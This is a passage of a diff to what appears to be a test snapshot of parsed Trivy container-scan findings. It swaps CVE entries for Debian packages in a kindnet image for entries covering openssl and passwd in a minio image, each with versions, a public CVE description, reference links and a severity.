10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", - ], - }, - "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-43618", - "installedVersion": "2:6.1.2+dfsg-4", - "packageName": "libgmp10", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/8", - "http://www.openwall.com/lists/oss-security/2022/10/13/3", - "https://access.redhat.com/security/cve/CVE-2021-43618", - "https://bugs.debian.org/994405", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", - "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", - "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", - "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", - "https://security.netapp.com/advisory/ntap-20221111-0001/", - "https://ubuntu.com/security/notices/USN-5672-1", - "https://ubuntu.com/security/notices/USN-5672-2", - "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Integer overflow and resultant buffer overflow via crafted input", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43618", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/8", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43618", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://bugs.debian.org/994405", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20231", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20231", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20231.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20231", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnutls: Use after free in client key_share extension", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20231", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20231", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20232", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20232", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20232.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20232", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20232", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20232", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": 